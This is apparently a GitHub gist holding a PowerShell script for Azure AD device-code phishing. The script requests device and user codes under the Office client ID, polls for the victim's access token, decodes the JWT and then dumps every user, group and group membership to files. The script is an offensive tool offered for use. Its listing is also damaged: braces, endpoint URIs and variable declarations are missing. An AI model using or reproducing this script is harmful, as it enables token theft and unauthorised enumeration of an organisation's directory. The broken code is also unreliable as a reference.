Skip to content

Instantly share code, notes, and snippets.

Created February 3, 2021 01:21
Show Gist options
  • Save rvrsh3ll/3b2fc8ff50941c565b1f83cf2d58bcb9 to your computer and use it in GitHub Desktop.
Save rvrsh3ll/3b2fc8ff50941c565b1f83cf2d58bcb9 to your computer and use it in GitHub Desktop.
function Parse-JWTtoken {
if (!$token.Contains(".") -or !$token.StartsWith("eyJ")) { Write-Error "Invalid token" -ErrorAction Stop }
$tokenheader = $token.Split(".")[0].Replace('-', '+').Replace('_', '/')
while ($tokenheader.Length % 4) {
$tokenheader += "="
[System.Text.Encoding]::ASCII.GetString([system.convert]::FromBase64String($tokenheader)) | ConvertFrom-Json | fl | Out-Default
$tokenPayload = $token.Split(".")[1].Replace('-', '+').Replace('_', '/')
while ($tokenPayload.Length % 4) {
$tokenPayload += "="
$tokenByteArray = [System.Convert]::FromBase64String($tokenPayload)
$tokenArray = [System.Text.Encoding]::ASCII.GetString($tokenByteArray)
$tokobj = $tokenArray | ConvertFrom-Json
return $tokobj
"client_id" = "d3590ed6-52b3-4102-aeff-aad2292ab01c"
"resource" = ""
# Invoke the request to get device and user codes
$authResponse = Invoke-RestMethod -UseBasicParsing -Method Post -Uri "" -Body $body
$user_code = $authResponse.user_code
write-output $authResponse
$continue = $true
$interval = $authResponse.interval
$expires = $authResponse.expires_in
# Create body for authentication requests
"client_id" = "d3590ed6-52b3-4102-aeff-aad2292ab01c"
"grant_type" = "urn:ietf:params:oauth:grant-type:device_code"
"code" = $authResponse.device_code
"resource" = ""
# Loop while authorisation is pending or until timeout exceeded
Start-Sleep -Seconds $interval
$total += $interval
if($total -gt $expires)
Write-Error "Timeout occurred"
# Try to get the response. Will give 40x while pending so we need to try&catch
$response = Invoke-RestMethod -UseBasicParsing -Method Post -Uri " " -Body $body -ErrorAction SilentlyContinue
# This is normal flow, always returns 40x unless successful
$details=$_.ErrorDetails.Message | ConvertFrom-Json
$continue = $details.error -eq "authorization_pending"
Write-Host $details.error
# Not pending so this is a real error
Write-Error $details.error_description
# If we got response, all okay!
write-output $response
$jwt = $response.access_token
$output = Parse-JWTtoken -token $jwt
$upn = $output.upn
write-output $upn
Write-output "Dumping Users"
Connect-AzureAD -AadAccessToken $response.access_token -AccountId $upn
Get-AzureADUser -All $True | Select-Object -Property * | Out-File AD-users.txt
Write-output "Dumping Groups"
Get-AzureADGroup -All $True | Select-Object -Property * | Out-File AD-groups.txt
Write-output "Dumping Groups Membership"
foreach($group in Get-AzureADGroup -All $True) {
$group.DisplayName | Out-File GroupMembership.txt -Append
Get-AzureADGroupMember -ObjectId $group.ObjectId -All $True | Out-File GroupMembership.txt -Append
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment